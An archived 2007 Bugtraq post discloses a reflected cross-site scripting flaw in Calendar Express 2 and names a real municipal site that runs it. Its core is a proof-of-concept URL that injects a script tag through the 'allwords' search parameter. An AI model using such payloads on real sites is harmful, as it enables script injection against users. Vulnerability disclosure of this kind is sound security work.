XSS in [Calendar Express 2 ]

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: XSS in [Calendar Express 2 ]
From: bl4ck@xxxxxxxxxxx
Date: 14 Feb 2007 17:10:10 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

hey guys .. check out this new xss i just found  ;P

Vulnerable : Calendar Express 2 
web : http://www.ci.emeryville.ca.us/calendar, 
http://www.phplite.com/products/calendarexpress/


XSS :

http://127.0.0.1/calendar/search.php?allwords=%22%3E%3Cscript%3Ealert%28%27bl4ck%27%29%3C%2Fscript%3E&cid=1&title=1&desc=1


################################
Discovered  By BLacK ZeRo
K.S.A
bL4ck@xxxxxxxxxxx
################################

Best regards ,,

Prev by Date: Lizardtech DjVu Browser Plug-in - Multiple Vulnerabilities
Next by Date: Re: [BLACKLIST] [Full-disclosure] Solaris telnet vulnberability -
Previous by thread: Lizardtech DjVu Browser Plug-in - Multiple Vulnerabilities
Next by thread: XSS in [deskpro.com v1.1.0 ]
Index(es):
- Date
- Thread